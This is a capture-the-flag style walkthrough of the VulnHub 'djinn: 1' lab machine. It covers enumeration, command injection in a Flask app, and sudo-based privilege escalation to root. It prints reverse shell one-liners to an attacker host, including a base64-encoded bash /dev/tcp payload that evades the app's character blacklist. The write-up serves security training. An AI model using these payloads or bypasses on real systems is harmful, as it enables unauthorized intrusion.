vulnhub-walkthrough[djinn-1]

Posted on Edited on In Views: Word count in article: 1.8k Reading time ≈ 6 mins.

name

Name: djinn: 1
Date release: 18 Nov 2019

download

Download: https://drive.google.com/file/d/1LlT5JcdlyDUcvkn12t9oIIFo0X9Gt53B/view?usp=sharing
Download (Mirror): https://download.vulnhub.com/djinn/djinn.ova
Download (Torrent): https://download.vulnhub.com/djinn/djinn.ova.torrent

description

  • Level: Beginner-Intermediate
  • flags: user.txt and root.txt
  • Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You’ll see the IP right on the login screen. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively.
  • Format: Virtual Machine (Virtualbox - OVA)
  • Operating System: Linux

information gathering

first use nmap as usual

1
2
3
4
root@kali:~# nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.127
Host is up (0.00013s latency).
MAC Address: 08:00:27:03:DB:2D (Oracle VirtualBox virtual NIC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@kali:~# nmap -sV -sC -v -p- -T4 192.168.56.127
PORT     STATE    SERVICE VERSION
21/tcp   open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.126
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   filtered ssh
1337/tcp open     waste?
| fingerprint-strings: 
|   NULL: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|     '*', 9)
|   RPCCheck: 
|     ____ _____ _ 
|     ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___ 
|     \x20/ _ \x20 | | | | '_ ` _ \x20/ _ \n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
|     ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
|     Let's see how good you are with simple maths
|     Answer my questions 1000 times and I'll give you your gift.
|_    '+', 5)
7331/tcp open     http    Werkzeug httpd 0.16.0 (Python 2.7.15+)
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
  • Enumeration

ftp anonymous login, then get three files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@kali:~/vulnhub/djinn-1# ftp 192.168.56.127
Connected to 192.168.56.127.
220 (vsFTPd 3.0.3)
Name (192.168.56.127:root): anonymous 
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
-rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
226 Directory send OK.
ftp> get creds.txt
local: creds.txt remote: creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for creds.txt (11 bytes).
226 Transfer complete.
11 bytes received in 0.00 secs (109.6142 kB/s)
ftp> get game.txt
local: game.txt remote: game.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.txt (128 bytes).
226 Transfer complete.
128 bytes received in 0.02 secs (7.0244 kB/s)
ftp> get message.txt
local: message.txt remote: message.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for message.txt (113 bytes).
226 Transfer complete.
113 bytes received in 0.05 secs (2.4331 kB/s)

use cat command to check the content

1
2
3
4
5
6
7
8
root@kali:~/vulnhub/djinn-1# cat creds.txt 
nitu:81299
root@kali:~/vulnhub/djinn-1# cat game.txt 
oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the 
final level and get the prize.
root@kali:~/vulnhub/djinn-1# cat message.txt 
@nitish81299 I am going on holidays for few days, please take care of all the work. 
And don't mess up anything.

use Netcat to make a connection so that we can play the game

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali:~# nc 192.168.56.127 1337
  ____                        _____ _                
 / ___| __ _ _ __ ___   ___  |_   _(_)_ __ ___   ___ 
| |  _ / _` | '_ ` _ \ / _ \   | | | | '_ ` _ \ / _ \
| |_| | (_| | | | | | |  __/   | | | | | | | | |  __/
 \____|\__,_|_| |_| |_|\___|   |_| |_|_| |_| |_|\___|
                                                     

Let's see how good you are with simple maths
Answer my questions 1000 times and I'll give you your gift.
(9, '+', 9)
> 18
(3, '-', 1)
> 2
(2, '/', 3)
> 2
Wrong answer

it’s just a waste time game, go for next step

1
http://192.168.56.127:7331/

use gobuster for dir

1
2
3
gobuster dir -u http://192.168.56.127:7331/ -w /usr/share/wordlists/dirb/big.txt -t 500
/genie (Status: 200)
/wish (Status: 200)

genie page is an error 403,perhaps it’s no use
the following page is a little interesting

1
http://192.168.56.127:7331/wish

this page can excecute commands

request:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /wish HTTP/1.1
Host: 192.168.56.127:7331
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://192.168.56.127:7331
Connection: close
Referer: http://192.168.56.127:7331/wish
Upgrade-Insecure-Requests: 1

cmd=id

response:

1
2
3
4
5
6
7
8
9
10
11
HTTP/1.0 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 379
Location: http://192.168.56.127:7331/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A
Server: Werkzeug/0.16.0 Python/2.7.15+
Date: Sat, 23 May 2020 05:03:45 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A">/genie?name=uid%3D33%28www-data%29+gid%3D33%28www-data%29+groups%3D33%28www-data%29%0A</a>.  If not click the link.
  • Exploitation

get a shell by using nc

1
nc -e /bin/sh 192.168.56.126 1155

excecute the payload, we got the following error

1
http://192.168.56.127:7331/genie?name=Wrong+choice+of+words

some of the symbols are characters are restricted

we can use other payload, encrypt the whole command in base64 format 

1
bash -i >& /dev/tcp/192.168.56.126/8080 0>&1
1
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEyNi84MDgwIDA+JjE= | base64 -d | bash

then we get a shell

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~# nc -lvp 8080
listening on [any] 8080 ...
192.168.56.127: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.126] from (UNKNOWN) [192.168.56.127] 47358
bash: cannot set terminal process group (758): Inappropriate ioctl for device
bash: no job control in this shell
www-data@djinn:/opt/80$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@djinn:/opt/80$ whoami
whoami
www-data

let’s take a look around

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
www-data@djinn:/opt/80$ cat app.py
cat app.py
import subprocess

from flask import Flask, redirect, render_template, request, url_for

app = Flask(__name__)
app.secret_key = "key"

CREDS = "/home/nitish/.dev/creds.txt"

RCE = ["/", ".", "?", "*", "^", "$", "eval", ";"]


def validate(cmd):
    if CREDS in cmd and "cat" not in cmd:
        return True

    try:
        for i in RCE:
            for j in cmd:
                if i == j:
                    return False
        return True
    except Exception:
        return False


@app.route("/", methods=["GET"])
def index():
    return render_template("main.html")


@app.route("/wish", methods=['POST', "GET"])
def wish():
    execute = request.form.get("cmd")
    if execute:
        if validate(execute):
            output = subprocess.Popen(execute, shell=True,
                                      stdout=subprocess.PIPE).stdout.read()
        else:
            output = "Wrong choice of words"

        return redirect(url_for("genie", name=output))
    else:
        return render_template('wish.html')


@app.route('/genie', methods=['GET', 'POST'])
def genie():
    if 'name' in request.args:
        page = request.args.get('name')
    else:
        page = "It's not that hard"

    return render_template('genie.html', file=page)


if __name__ == "__main__":
    app.run(host='0.0.0.0', debug=True)
1
2
cat /home/nitish/.dev/creds.txt
nitish:p4ssw0rdStr3r0n9

change our shell to a tty shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@djinn:/opt/80$ python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ su nitish
su nitish
Password: p4ssw0rdStr3r0n9

nitish@djinn:/opt/80$ id
id
uid=1001(nitish) gid=1001(nitish) groups=1001(nitish)
nitish@djinn:/opt/80$ whoami
whoami
nitish

finally, we get user.txt…

1
2
3
4
5
6
7
8
nitish@djinn:/opt/80$ cd ~
cd ~
nitish@djinn:~$ ls
ls
user.txt
nitish@djinn:~$ cat user.txt
cat user.txt
10aay8289ptgguy1pvfa73alzusyyx3c

Post Exploitation

1
2
3
4
5
6
7
8
nitish@djinn:~$ sudo -l                                                                              
sudo -l                                                                                              
Matching Defaults entries for nitish on djinn:                                                       
    env_reset, mail_badpass,                                                                         
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin         

User nitish may run the following commands on djinn:
    (sam) NOPASSWD: /usr/bin/genie

understand how it works

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nitish@djinn:~$ genie
genie
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish
genie: error: the following arguments are required: wish
nitish@djinn:~$ genie -h
genie -h
usage: genie [-h] [-g] [-p SHELL] [-e EXEC] wish

I know you've came to me bearing wishes in mind. So go ahead make your wishes.

positional arguments:
  wish                  Enter your wish

optional arguments:
  -h, --help            show this help message and exit
  -g, --god             pass the wish to god
  -p SHELL, --shell SHELL
                        Gives you shell
  -e EXEC, --exec EXEC  execute command

now we get a shell of user sam

1
2
3
4
5
6
7
8
9
nitish@djinn:~$ sudo -u sam genie -cmd new
sudo -u sam genie -cmd new
my man!!
$ id
id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)
$ whoami
whoami
sam

use the following command to get a stable shell,then enumerate again

1
2
3
4
5
6
7
8
9
10
$ bash
bash
sam@djinn:~$ sudo -l
sudo -l
Matching Defaults entries for sam on djinn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sam may run the following commands on djinn:
    (root) NOPASSWD: /root/lago

Privilege Escalation

and we get root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sam@djinn:~$ sudo -u root /root/lago 
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100: 
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# whoami
whoami
root

next, we try to find the flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
# bash
bash
root@djinn:~# su root
su root
root@djinn:/home/nitish# cd
root@djinn:~# ls
ls
lago  proof.sh
root@djinn:~# ./proof.sh
./proof.sh
'unknown': I need something more specific.
    _                        _             _ _ _ 
   / \   _ __ ___   __ _ ___(_)_ __   __ _| | | |
  / _ \ | '_ ` _ \ / _` |_  / | '_ \ / _` | | | |
 / ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/   \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
                                     |___/       
djinn pwned...
__________________________________________________________________________

Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Sat May 23 11:23:39 IST 2020
Whoami: root
__________________________________________________________________________

By @0xmzfr

Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)

Summary of knowledge

  • Command execution bypass
  • Sensitive information disclosure
  • custom program Privilege Escalation

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lucifer11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…